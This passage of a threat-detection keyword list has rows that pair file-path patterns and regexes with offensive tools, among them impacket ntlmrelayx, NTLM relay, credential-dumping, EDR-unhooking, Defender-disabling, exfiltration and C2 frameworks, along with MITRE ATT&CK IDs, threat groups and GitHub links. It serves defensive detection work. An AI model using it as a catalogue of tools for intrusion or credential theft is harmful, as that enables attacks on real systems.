tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","9268" "*/NSudoG.exe*",".{0,1000}\/NSudoG\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","9269" "*/ntapphelpcachecontrol*",".{0,1000}\/ntapphelpcachecontrol.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","9270" "*/ntdissector.git*",".{0,1000}\/ntdissector\.git.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","1","N/A","N/A","9","2","139","17","2024-08-16T14:18:35Z","2023-09-05T12:13:47Z","9271" "*/ntdissector/*",".{0,1000}\/ntdissector\/.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. 
Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","#linux","N/A","9","2","139","17","2024-08-16T14:18:35Z","2023-09-05T12:13:47Z","9272" "*/ntdll_unhooking.exe*",".{0,1000}\/ntdll_unhooking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","9273" "*/ntdll_unhooking.exe*",".{0,1000}\/ntdll_unhooking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","9274" "*/ntdlll-unhooking-collection*",".{0,1000}\/ntdlll\-unhooking\-collection.{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","N/A","9","2","188","38","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z","9275" "*/NTDLLReflection.git*",".{0,1000}\/NTDLLReflection\.git.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and 
trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","N/A","9","3","293","45","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z","9276" "*/NtdllUnpatcher.git*",".{0,1000}\/NtdllUnpatcher\.git.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","N/A","10","2","150","33","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z","9277" "*/ntds_dump_*.txt*",".{0,1000}\/ntds_dump_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","9278" "*/ntdsuseraccount.py*",".{0,1000}\/ntdsuseraccount\.py.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","1","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","9279" "*/ntdsutil.py*",".{0,1000}\/ntdsutil\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","9280" "*/ntfs-read.py*",".{0,1000}\/ntfs\-read\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","9281" "*/NTHASH-FPC.git*",".{0,1000}\/NTHASH\-FPC\.git.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","9282" "*/ntlm.py*",".{0,1000}\/ntlm\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","9283" "*/ntlmdecoder.py*",".{0,1000}\/ntlmdecoder\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","9284" "*/ntlmdecoder.py*",".{0,1000}\/ntlmdecoder\.py.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","9285" "*/NTLMInjector.git*",".{0,1000}\/NTLMInjector\.git.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","1","N/A","N/A","10","2","167","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z","9286" "*/NTLMParse.go*",".{0,1000}\/NTLMParse\.go.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. 
This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","Black Basta","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","1","N/A","N/A","10","2","179","15","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z","9287" "*/ntlmquic*",".{0,1000}\/ntlmquic.{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Exploitation tool","https://github.com/xpn/ntlmquic","1","1","N/A","network exploitation tool","6","2","122","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z","9288" "*/NTLMRecon*",".{0,1000}\/NTLMRecon.{0,1000}","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Discovery","https://github.com/pwnfoo/NTLMRecon","1","1","N/A","N/A","N/A","5","481","70","2024-06-24T18:11:12Z","2019-12-01T06:06:30Z","9289" "*/NTLMRecon.git*",".{0,1000}\/NTLMRecon\.git.{0,1000}","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","N/A","8","1","35","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z","9290" "*/ntlmrecon/*.py*",".{0,1000}\/ntlmrecon\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","N/A","8","1","35","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z","9291" 
"*/NTLMRelay2Self*",".{0,1000}\/NTLMRelay2Self.{0,1000}","offensive_tool_keyword","NTLMRelay2Self","An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).","T1078 - T1078.004 - T1557 - T1557.001 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/med0x2e/NTLMRelay2Self","1","1","N/A","N/A","10","5","400","42","2024-01-27T08:52:03Z","2022-04-30T10:05:02Z","9292" "*/NtlmRelayToEWS.git*",".{0,1000}\/NtlmRelayToEWS\.git.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","1","N/A","N/A","10","4","331","60","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z","9293" "*/NtlmRelayToEWS/*",".{0,1000}\/NtlmRelayToEWS\/.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","1","N/A","N/A","10","4","331","60","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z","9294" "*/ntlmrelayx.exe*",".{0,1000}\/ntlmrelayx\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","9295" "*/ntlmrelayx.exe*",".{0,1000}\/ntlmrelayx\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","9296" "*/ntlmrelayx.py*",".{0,1000}\/ntlmrelayx\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","9297" "*/ntlmrelayx.py*",".{0,1000}\/ntlmrelayx\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/LuemmelSec/ntlmrelayx.py_to_exe","1","1","N/A","N/A","10","1","86","17","2023-05-26T05:35:52Z","2023-05-15T17:58:26Z","9298" "*/ntlmrelayx/*",".{0,1000}\/ntlmrelayx\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik 
Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","9299" "*/ntlmrelayx/*",".{0,1000}\/ntlmrelayx\/.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550.003 - T1557.002 - T1552.004 - T1212 - T1550","TA0009 - TA0008","N/A","N/A","Lateral Movement","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","N/A","8","737","82","2025-01-03T14:25:52Z","2021-07-27T19:06:09Z","9300" "*/ntlmscan.git*",".{0,1000}\/ntlmscan\.git.{0,1000}","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","N/A","4","359","57","2024-06-27T11:10:32Z","2019-10-23T06:02:56Z","9301" "*/ntlmscan/*",".{0,1000}\/ntlmscan\/.{0,1000}","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","N/A","4","359","57","2024-06-27T11:10:32Z","2019-10-23T06:02:56Z","9302" "*/NTLMSleuth.git*",".{0,1000}\/NTLMSleuth\.git.{0,1000}","offensive_tool_keyword","NTLMSleuth","verify NTLM hash integrity against the robust database of ntlm.pw.","T1003 - T1555","TA0006","N/A","Black Basta","Credential Access","https://github.com/jmarr73/NTLMSleuth","1","1","N/A","N/A","8","1","8","0","2024-08-28T15:21:10Z","2023-12-12T16:41:35Z","9303" "*/NtlmThief.git*",".{0,1000}\/NtlmThief\.git.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching 
lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","1","N/A","N/A","10","3","235","33","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z","9304" "*/ntlmtransport.go*",".{0,1000}\/ntlmtransport\.go.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","9305" "*/ntlmUserPasswords.ntlm*",".{0,1000}\/ntlmUserPasswords\.ntlm.{0,1000}","offensive_tool_keyword","DPAT","Domain Password Audit Tool for Pentesters","T1003 - T1087 - T1110 - T1555","TA0006 - TA0004 - TA0002 - TA0005","N/A","N/A","Credential Access","https://github.com/clr2of8/DPAT","1","0","N/A","N/A","10","10","954","156","2022-06-24T21:41:43Z","2016-11-22T22:00:21Z","9306" "*/ntlmutil.py*",".{0,1000}\/ntlmutil\.py.{0,1000}","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. 
Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Discovery","https://github.com/pwnfoo/NTLMRecon","1","1","N/A","N/A","N/A","5","481","70","2024-06-24T18:11:12Z","2019-12-01T06:06:30Z","9307" "*/ntlmutil.py*",".{0,1000}\/ntlmutil\.py.{0,1000}","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","N/A","8","1","35","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z","9308" "*/ntlmv1.py*",".{0,1000}\/ntlmv1\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","9309" "*/ntlmv1.py*",".{0,1000}\/ntlmv1\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","9310" "*/ntpescape.git*",".{0,1000}\/ntpescape\.git.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","Black Basta","Data 
Exfiltration","https://github.com/evallen/ntpescape","1","1","N/A","N/A","10","2","138","15","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z","9311" "*/ntp-info.nse*",".{0,1000}\/ntp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9312" "*/ntp-monlist.nse*",".{0,1000}\/ntp\-monlist\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9313" "*/NtQuerySystemInformation.md*",".{0,1000}\/NtQuerySystemInformation\.md.{0,1000}","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","N/A","10","2124","286","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z","9314" "*/NtRemoteLoad.exe*",".{0,1000}\/NtRemoteLoad\.exe.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation 
tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","N/A","10","3","213","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z","9315" "*/NtRemoteLoad.git*",".{0,1000}\/NtRemoteLoad\.git.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","N/A","10","3","213","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z","9316" "*/NtRights/*",".{0,1000}\/NtRights\/.{0,1000}","offensive_tool_keyword","NtRights","tool for adding privileges from the commandline","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/gtworek/PSBits/tree/master/NtRights","1","1","N/A","N/A","7","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","9317" "*/NtSetSystemInformation.md*",".{0,1000}\/NtSetSystemInformation\.md.{0,1000}","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","N/A","10","2124","286","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z","9318" "*/Nuages_Cli*",".{0,1000}\/Nuages_Cli.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","9319" "*/nuagesAPI.js*",".{0,1000}\/nuagesAPI\.js.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","9320" 
